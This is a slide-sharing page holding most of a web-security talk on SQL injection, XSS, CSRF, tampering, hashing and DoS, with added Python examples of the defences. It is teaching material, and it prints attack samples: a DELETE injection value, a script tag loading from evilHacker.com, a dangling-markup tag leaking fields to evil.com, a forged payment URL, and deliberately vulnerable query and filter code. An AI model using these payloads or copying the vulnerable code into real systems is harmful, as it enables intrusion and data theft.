Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Globus
 
Why React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdfWhy React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdf
ayushiqss
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
Georgi Kodinov
 
De mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FMEDe mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FME
Jelle | Nordend
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
Peter Caitens
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Globus
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Globus
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
Cyanic lab
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
Globus
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
Max Andersen
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
vrstrong314
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
Ortus Solutions, Corp
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
informapgpstrackings
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
XfilesPro
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 

Recently uploaded (20)

Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
 
Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
 
Why React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdfWhy React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdf
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
 
De mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FMEDe mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FME
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
 

Web Security Threats and Solutions

8. (Pseudo) Solutions
• Replace special symbols (-, ", ')
o Data with special symbols not searchable
o Poor routines can create vulnerable query (i.e. –'–)
• Smuggling
o Looks like a quote but not a quote - conversion on DB level
o OWASP_IL_2007_SQL_Smuggling.pdf
• NOSQL is not vulnerable
o NOSQL is also vulnerable (i.e. MongoDB with JavaScript)
• Second order attacks
o Validate request only
o Data stored in the DB and later used in prepared queries

9. Using Parameters (in wrong manner)
• Dynamic queries (sp_executesql vs. EXEC)
o exec (@sqlString) - executes T-SQL string
o sp_executesql allows for statements to be parameterized
o sp_executesql is more secure in terms of SQL injection
• Developer believes dynamic SQL is the only option

    -- Vulnerable: @Sort is pasted into the statement text, so sp_executesql
    -- gains nothing; the caller controls the SQL
    CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS
    DECLARE @sql nvarchar(255)
    SET @sql = 'SELECT UserName FROM Users ' + @Sort
    EXECUTE sp_executesql @sql
    GO

o What if @Sort = ''; DELETE FROM Users'

    -- Safe: @Sort is an integer that selects a sort order, never SQL text
    CREATE PROCEDURE GetUsers @Sort int AS
    SELECT UserName FROM Users
    ORDER BY CASE WHEN @Sort = 1 THEN (RANK() OVER (ORDER BY UserName ASC)) END
    GO

10. Prevention & Mitigation
• Parameterized queries and prepared statements
o Use parameters where data are expected
o ORMs use parameters (NHibernate, Entity Framework)
• "The least privilege" principle
o Grant the minimum access rights
o Parameterized queries vs. Stored Procedure permissions
• Positive input validation (Poor)
o Regular expressions / White lists (i.e. alphanumeric)
• IIS Request Query Filtering (Poor)
o filtering-for-sql-injection-on-iis-7-and-later
• SQL injection and DB takeover
o http://ha.ckers.org/sqlinjection/
o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/

11. SQL Injection with Entity Framework
• Entity Framework Raw Queries

    // Raw SQL bypasses the ORM's parameterization entirely
    string query = "query" + "SQL injection code";
    dbContext.Database.SqlQuery<string>(query).ToList();

o Security Considerations (Entity Framework)
• IQueryable
o Can result in untrusted calls
o If provided as a library, can be cast to Context and connection

    var orders = repository.GetOrders(5);
    var context = ((ObjectQuery)orders).Context;

o Use IEnumerable instead

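The three points of slides 8 to 11 (dynamic SQL vs. bound parameters, a whitelisted ORDER BY in place of the slide's CASE expression, and the second-order case where a safely stored value is later pasted into a dynamic query) as one runnable example. This is added here and is not code from the slides; it uses SQLite instead of SQL Server, and the table and rows are constructed.

```python
import sqlite3

# Constructed sample rows, not taken from the slides.
SAMPLE_USERS = [("alice", "Alice"), ("bob", "Bob"), ("carol", "Carol")]

# Whitelist in the spirit of the slide's CASE ... ORDER BY: callers pick a key,
# never SQL text, and unknown keys are rejected.
SORT_CLAUSES = {1: "UserName ASC", 2: "UserName DESC"}


def make_db():
    """In-memory SQLite database with a small Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, DisplayName TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, name):
    """Anti-pattern from the slides: request data concatenated into the SQL text."""
    sql = "SELECT UserName FROM Users WHERE UserName = '" + name + "'"
    return sorted(row[0] for row in conn.execute(sql))


def find_user_safe(conn, name):
    """Parameterised query: the driver binds name as data, so it cannot change
    the structure of the statement."""
    sql = "SELECT UserName FROM Users WHERE UserName = ?"
    return sorted(row[0] for row in conn.execute(sql, (name,)))


def list_users_sorted(conn, sort_key):
    """ORDER BY cannot be a bound parameter, so an integer key selects a
    whitelisted clause and anything else is refused."""
    clause = SORT_CLAUSES.get(sort_key)
    if clause is None:
        raise ValueError("unknown sort key: %r" % (sort_key,))
    sql = "SELECT UserName FROM Users ORDER BY " + clause
    return [row[0] for row in conn.execute(sql)]


def set_display_name(conn, user, display_name):
    """Stores the value correctly, with parameters. A 'validate the request'
    strategy looks only here, and here nothing goes wrong."""
    conn.execute("UPDATE Users SET DisplayName = ? WHERE UserName = ?",
                 (display_name, user))


def users_with_same_display_name_vulnerable(conn, user):
    """Second-order injection: the stored value is read back safely and then
    pasted into a dynamic query. The payload was not in this request at all."""
    (display,) = conn.execute(
        "SELECT DisplayName FROM Users WHERE UserName = ?", (user,)).fetchone()
    sql = "SELECT UserName FROM Users WHERE DisplayName = '" + display + "'"
    return sorted(row[0] for row in conn.execute(sql))
```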
13. Cross Site Scripting (XSS)
Def: Untrusted content displayed on page unencoded
• Case
o evilHacker injects <script> in http://goodSite.com application context
  • By posting HTML form field
  • By tricking user to click link with query parameters sent by mail
    %3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E
• XSS Source
o Query parameters, HTML form fields
o HTML Attributes (onload, onblur)
o URI requested and displayed in HTTP 404 page
o Data from DB or file system
o 3rd party data - RSS feeds or service

14. XSS - an Underestimated Threat
• Create or access any DOM element
• Hijack cookies, credentials or actions
• Take control over victim machine
Browser Exploitation Framework Project
o Open source penetration testing tool
o XSS vulnerability allows injection of BeEF
o Victim browser is hooked
o Perform actions/attacks on behalf of the victim
o Exploit system in browser context

15. Persisted XSS
• Attacker stores malicious data on server
• Unvalidated data displayed on page w/o encoding
• Store once - run many

16. Reflected XSS
• Malicious client data is immediately used by server
• Unvalidated data displayed on page w/o encoding
• Requires social engineering
o Convince users to follow a URL (via e-mail or forum comment)
• Detection Tools
o OWASP Xenotix XSS Exploit Framework
o XSS-ME FireFox plugin

17. Client XSS & HTML Injection
• DOM-based XSS
o Malicious data executed as a part of DOM manipulation
o Requires social engineering

    // Part of the current URL written straight into the DOM, unencoded
    document.write("<OPTION value=1>" + document.location.href.substring(…) + "</OPTION>");

• Dangling Markup HTML injection
o Image source w/o closing tag
o On load of image - a request is made to attacker's site

    <img src='http://evil.com/log.cgi?     <- Injected line with a non-terminated parameter
    ...
    <input type="hidden" name="SecretField" value="12345">
    ...
    '                                       <- Normally-occurring apostrophe somewhere in page text

o HTML leaks to evil site

18. All user input is evil

19. XSS Prevention & Mitigation
• HTML escape then JavaScript escape
• Encode on usage, not appearance
o HttpUtility.HtmlEncode(string)
o HttpUtility.JavaScriptStringEncode(string)
o Microsoft Anti-Cross Site Scripting Library
• Use proven sanitizers
o Blacklist vs. Whitelist
o Valid JavaScript can be created by poor filtering routine
    <SscriptCscriptRscriptIscriptPscriptTscript>…
• Check 3rd party resources (i.e. jQuery plugins)
• Analyze places where DOM elements are created
o Use document.createElement() rather than $(obj).html()

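Added example for slide 19, not code from the slides or from .NET: context-specific output encoding done at the point of use, beside the poor blacklist filter from the slide, which turns the <SscriptCscriptRscriptIscriptPscriptTscript> input into a working tag. The two encoders are minimal stand-ins with the same intent as HttpUtility.HtmlEncode and HttpUtility.JavaScriptStringEncode, not those library functions.

```python
# Minimal HTML encoder for text and quoted attribute contexts (stand-in for
# HttpUtility.HtmlEncode; written for this example).
_HTML_MAP = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"}


def html_encode(text):
    """Encode for insertion into HTML text or a quoted attribute value."""
    return "".join(_HTML_MAP.get(ch, ch) for ch in text)


def js_string_encode(text):
    """Encode for insertion inside a JavaScript string literal. Anything that
    could close the literal or the surrounding <script> block becomes a \\uXXXX
    escape (stand-in for HttpUtility.JavaScriptStringEncode; not the .NET code)."""
    out = []
    for ch in text:
        if ch == "\\":
            out.append("\\\\")
        elif ch in "\"'<>&":
            out.append("\\u%04x" % ord(ch))
        elif ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif ord(ch) < 0x20:
            out.append("\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def render_option(label):
    """'Encode on usage': the raw value is stored as-is and encoded for the
    HTML context at the moment it is written into the page."""
    enc = html_encode(label)
    return '<option value="%s">%s</option>' % (enc, enc)


def render_script_var(name, value):
    """Same idea for a script block: HTML encoding would be the wrong encoder
    here, JavaScript string encoding keeps the value inside the literal."""
    return '<script>var %s = "%s";</script>' % (name, js_string_encode(value))


def strip_script_blacklist(text):
    """The poor filtering routine from the slide: delete the word 'script'.
    Nested occurrences survive as a valid tag once the inner ones are removed."""
    return text.replace("script", "")
```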
20. Built-In XSS Prevention Features (.NET)
• Request Validation
o ASP.NET Web Forms: <%@ Page ValidateRequest="true" %>
o ASP.NET MVC: Controller.ValidateRequest = true;
o <httpRuntime requestValidationMode="4.0" />
• Do not turn off request validation
o "Easy fix" for HTML editors
o Use HTML editors that HTML encode before submission
• Reliability
o Microsoft advice: Relying solely on built-in request validation is not enough
o No known vulnerabilities now (but not in the past)
• AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode()
o HttpUtility just ensures output does not break HTML
o Performance penalty is +0.1 ms/transaction

21. Content Security Policy
• HTTP Header
o Content-Security-Policy: script-src 'self'
• Features
o Whitelist sources of trusted content
o Blocks resources from untrusted locations (incl. inline scripts)
o Report of blocked resources
• Directives
o script-src; img-src; media-src; style-src; frame-src; connect-src
• Keywords
o 'none', 'self', 'unsafe-inline', 'unsafe-eval'
• Browser support
o CanIUse.com CSP?

22. CSRF has nothing to do with sea-surf

23. Cross-Site Request Forgery (CSRF)
Def: Unauthorised commands transmitted from a user whom a website trusts
• Synonyms: One-click attack, Session riding
• Case
o User logs in http://goodSite.com as usual
o http://evilHacker.com can
  • POST new password in form to GoodSite.com
  • GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker
o Authenticated because cookies are sent
• Impact
o EvilHacker.com cannot read DOM but can POST / GET
o Act on behalf of the user (i.e. payment)
o User access is blocked or stolen

24. Cross Site Script Inclusion (XSSI)
• Case
o Exploits <script> element exception to Same Origin Policy
o http://goodSite.com includes own <script> for AJAX request
o http://evilHacker.com includes the same script
  • Authenticated because cookies are sent
o Server returns JSON wrapped in function call

    <script type="application/javascript"
            src="http://goodSite.com/Svc/Get?callback=parseResponse"></script>

o SCRIPT evaluated in evilHacker.com context and JSON is stolen

    parseResponse({"this":"is","json":"data"});

• Impact
o User data are stolen
• Prevention
o Check policy of script inclusion

25. CSRF Prevention & Mitigation
• NONCE token (URL, hidden field)
o Checked upon submission
o Protected by browser same origin policy
• User defined (password, CAPTCHA)
• Built-In (ASP.NET)

    Page.ViewStateUserKey = Session.SessionID;

o Signs the ViewState with unique user key
• Built-In (ASP.NET MVC)
o HtmlHelper.AntiForgeryToken() - generates a hidden form field
o [ValidateAntiForgeryToken] attribute for controller validation
o NOT a single-use token
• POST (HTTP) makes attacks harder
o Cross domain POSTs can be limited (CORS)

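The NONCE token of slide 25, as an added example that is not from the slides or from ASP.NET: the token is bound to the session with an HMAC (the same idea as ViewStateUserKey tying ViewState to the user), checked in constant time, and a second variant makes it single-use, which the slide notes the MVC anti-forgery token is not. The server key and session ids are constructed values.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; in a deployment it lives in protected config.
SERVER_KEY = b"example-server-key-not-for-production"


def _mac(session_id, nonce):
    msg = (session_id + ":" + nonce).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def make_token(session_id):
    """Token = nonce.HMAC(key, session_id:nonce). The attacker's site cannot read
    it (same-origin policy), and a token lifted from one session fails in any
    other because the session id is part of the MAC input."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(session_id, nonce)


def check_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    return hmac.compare_digest(mac, _mac(session_id, nonce))


def hidden_field(token):
    """The hidden form field that carries the token back on submission."""
    return '<input type="hidden" name="__RequestVerificationToken" value="%s">' % token


class SingleUseTokens:
    """Variant that remembers spent nonces per session, so a token that was
    captured once cannot be replayed (the MVC token is not single-use)."""

    def __init__(self):
        self._spent = set()

    def consume(self, session_id, token):
        if not check_token(session_id, token):
            return False
        key = (session_id, token.split(".", 1)[0])
        if key in self._spent:
            return False
        self._spent.add(key)
        return True
```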
26. Parameter tampering

27. Parameter Tampering
Def: Parameters changed in unintended way
Common reasons
• Query string; Hidden form fields
• Data-channel interception (M-i-t-M attack)
Common Mistakes
• Client side validation only
• Mismatch with predefined set of values
• Not validated access to entities on server (i.e. EntityId=???)
• Unprotected data sent to client
o Query strings; JavaScript parameters

28. Tampering Prevention & Mitigation
• Built-In (ASP.NET MVC) - None
• Built-In (ASP.NET)
• ViewState
o Not encrypted by default (Binary serialized, Base64 Encoded)
o Do not turn EnableViewStateMac off (Web Farm, X-domain POST)
• Event Validation
o "Invalid postback or callback argument…"
o Not encrypted (Binary serialized, Base64 Encoded)
o Do not turn event validation off
o Register for event validation

    protected override void Render(HtmlTextWriter writer)
    {
        …
        // Values registered here are the only ones the control may post back
        Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, "John");
    }

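The two mechanisms of slide 28 as an added example (not ASP.NET code): a hidden field that is Base64-serialized and MAC-signed in the manner of ViewState with EnableViewStateMac on, so it stays readable but not modifiable, and an event-validation register in the spirit of RegisterForEventValidation that accepts only values the server rendered. The machine key and state values are constructed.

```python
import base64
import hashlib
import hmac
import json

# Constructed key; the ASP.NET equivalent is the <machineKey> validation key.
MACHINE_KEY = b"example-validation-key-not-for-production"


def _encode(state):
    return base64.b64encode(json.dumps(state, sort_keys=True).encode()).decode()


def protect_state(state):
    """Base64(serialized state) plus a MAC. Integrity only: no encryption."""
    payload = _encode(state)
    mac = hmac.new(MACHINE_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + mac


def unprotect_state(field):
    """The state dict, or None when the MAC does not match (edited or forged)."""
    try:
        payload, mac = field.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(MACHINE_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.b64decode(payload))


def peek_state(field):
    """'Not encrypted by default': anyone holding the field can read it."""
    return json.loads(base64.b64decode(field.rsplit(".", 1)[0]))


def replace_payload_keep_mac(field, new_state):
    """Test aid: a client edits the payload but cannot recompute the MAC."""
    return _encode(new_state) + "." + field.rsplit(".", 1)[1]


class EventValidator:
    """At render time the server registers the values a control may post back;
    on postback anything that was not registered is rejected."""

    def __init__(self):
        self._allowed = {}

    def register(self, control_id, value):
        self._allowed.setdefault(control_id, set()).add(value)

    def validate(self, control_id, posted_value):
        return posted_value in self._allowed.get(control_id, set())
```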
29. Encryption & Hashing

30. Encryption
• Protects sensitive data (if stolen)
o Credentials; Auth tokens; Configuration
• SQL data encryption
o EncryptByPassPhrase
o EncryptByCert
o EncryptByKey
• Application level
o AesCryptoServiceProvider, RijndaelManaged
o TripleDESCryptoServiceProvider
• Connection string encryption
o Machine-specific encryption after deploy

    aspnet_regiis -pe "connectionStrings" -app "/[appname]"

o Decryption done automatically

31. Hashing
• Irreversible function (MD5, SHA1, SHA256)
o MD5 generator: http://www.md5.cz/
o Smaller than the data
• Collisions allowed
• Usage
o Assure information was not changed (tampered)
o Protect passwords
• Compromising
o Good algorithm is always compromised by weak passwords
o Brute force (GPU)
o Precalculated "Rainbow tables" (Dictionary attack)
  • http://www.hashkiller.co.uk/md5-decrypter.aspx

32. Protecting Hashes
• Random Salt
o [SecretText][Salt] -> [Hash]
o Changes hash value
o Invalidates rainbow tables
o Slows down brute force attacks
• Complex passwords
• Slow algorithms
• Key stretching (Rfc2898DeriveBytes class)

    U1 = PRF(Password, Salt)
    U2 = PRF(Password, U1)
    ...
    Uc = PRF(Password, Uc-1)

• Outsource sensitive data storage (if possible)

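The U1 … Uc chain of slide 32 carried through as one PBKDF2 output block (RFC 8018; the function Rfc2898DeriveBytes implements, with HMAC-SHA1 as its default PRF). This is an added example, not slide or .NET code: the standard adds the block index to the salt and XORs the U values together, which the slide's sketch leaves out; the result is checked against hashlib, and two salts are shown to give two hashes for one password.

```python
import hashlib
import hmac
import secrets
import struct


def pbkdf2_block(password, salt, iterations, block_index=1, hash_name="sha256"):
    """One output block T_i of PBKDF2, written as the slide's chain of PRF calls:
         U1 = PRF(Password, Salt || INT(i))
         U2 = PRF(Password, U1)
         ...
         Uc = PRF(Password, Uc-1)
         T_i = U1 xor U2 xor ... xor Uc
    with PRF = HMAC keyed by the password."""
    def prf(data):
        return hmac.new(password, data, hash_name).digest()

    u = prf(salt + struct.pack(">I", block_index))   # U1
    t = bytearray(u)
    for _ in range(iterations - 1):                  # U2 .. Uc
        u = prf(u)
        for j, b in enumerate(u):
            t[j] ^= b
    return bytes(t)


def new_salt(length=16):
    """Random per-password salt; stored next to the hash, not secret."""
    return secrets.token_bytes(length)


def hash_password(password, salt, iterations=100_000):
    """Hex digest of the stretched password (one 32-byte block with SHA-256)."""
    return pbkdf2_block(password, salt, iterations).hex()


def verify_password(password, salt, iterations, stored_hex):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    return hmac.compare_digest(hash_password(password, salt, iterations), stored_hex)
```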
33. Information Leakage
• Loss of sensitive data
o Display trace and log information
o Display raw error messages
o Google it: inurl:elmah.axd aspxauth
o Attacker can profile application and select appropriate attack
• Mitigation
o Custom error pages

    <customErrors mode="On" defaultRedirect="Error.aspx" />

o Turn off tracing
• Retail mode

    <deployment retail="true" />

o Set in machine.config for the whole server
o Sets Custom Errors = "On", Debug = "false"
o Trace information is not displayed
• Test

34. Transport Layer Security

35. SSL / TLS
• HTTP over SSL prevents packet sniffing
• Force SSL for the entire site
o Or at least for credentials interchange
• ASP.NET MVC: RequireHttpsAttribute
o Redirects Request to HTTPS scheme
• ASP.NET Web Forms
o Requires custom code
o https://code.google.com/p/securityswitch/

    <securitySwitch mode="RemoteOnly">
      <paths>
        <add path="~/Login.aspx" />
      </paths>
    </securitySwitch>

36. Distributed Denial of Service

37. Denial of Service Attack DDoS
• Anonymous?!
o LOIC (Hive mode)
o TOR Anonymity Project
• Hash DoS (since 2003)
o POST params in hash table (with collisions)
o Too many hashes = 100% CPU
o Patch: Block POST of >1000 form fields
Prevention & Mitigation
• Dynamic IP restrictions IIS extension
o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions
• Good logging and diagnostics are essential

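The "too many requests in a time period" rule of the Dynamic IP Restrictions extension, written out as an added example (not IIS code) and run over constructed access-log lines, which is where the slide's logging point comes in: one client bursts 30 requests in 0.3 s, the other stays well under the limit. Thresholds and addresses are assumptions for the example.

```python
from collections import deque


class DynamicIpRestriction:
    """Per-client sliding window: more than max_requests within window_seconds
    denies the client for block_seconds. Modelled on the IIS rule, not its code."""

    def __init__(self, max_requests=20, window_seconds=1.0, block_seconds=60.0):
        self.max_requests = max_requests
        self.window = window_seconds
        self.block = block_seconds
        self._hits = {}      # ip -> deque of request timestamps inside the window
        self._blocked = {}   # ip -> time at which the block expires

    def allow(self, ip, now):
        """True if the request may be served, False if it is denied."""
        until = self._blocked.get(ip)
        if until is not None:
            if now < until:
                return False
            del self._blocked[ip]          # block expired, start counting again
        q = self._hits.setdefault(ip, deque())
        q.append(now)
        while q and q[0] <= now - self.window:
            q.popleft()                    # drop hits that fell out of the window
        if len(q) > self.max_requests:
            self._blocked[ip] = now + self.block
            q.clear()
            return False
        return True


def replay_log(limiter, lines):
    """Feed 'timestamp ip path' log lines through the limiter; returns the number
    of denied requests per ip (clients never denied are absent)."""
    denied = {}
    for line in lines:
        ts, ip, _path = line.split()
        if not limiter.allow(ip, float(ts)):
            denied[ip] = denied.get(ip, 0) + 1
    return denied


# Constructed log: a burst of 30 hits in 0.3 s from one client, 5 normal hits from another.
SAMPLE_LOG = (
    ["%.2f 198.51.100.7 /login" % (i * 0.01) for i in range(30)]
    + ["%.2f 203.0.113.5 /index" % (i * 0.5) for i in range(5)]
)
```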
38. Demo

39. Takeaways
• Guidelines & Code Labs
o Open Web Application Security Project: www.owasp.org
o Web App Exploits and Defenses: google-gruyere
o 2013 Top 10 Web Security Vulnerabilities: Top_10_2013
o 2011 Top 25 Most Dangerous Software Errors: cwe.mitre.org/top25
• Articles
o Hack-proofing ASP.NET Web Applications (Adam Tuliper)
o Hash DDoS: Hash-Dos-Attack
• .NET Source Code: referencesource.microsoft.com
• Tools
o ASafaWeb Analyser: asafaweb.com
o Website and Web Server Security Testing: www.beyondsecurity.com

40. Upcoming events
ISTA Conference, 26-27 November: http://istabg.org/
Stay tuned for 2015:
• Azure Bootcamp: http://azure-camp.eu/
• UXify Bulgaria: http://uxify.org/
• SQLSaturday: https://www.sqlsaturday.com/
• and more
js.next();

41. Thanks to our Sponsors
Diamond Sponsor; Hosting partner; Gold Sponsors; Silver Sponsors; Technological Partners; Swag Sponsors; Media Partners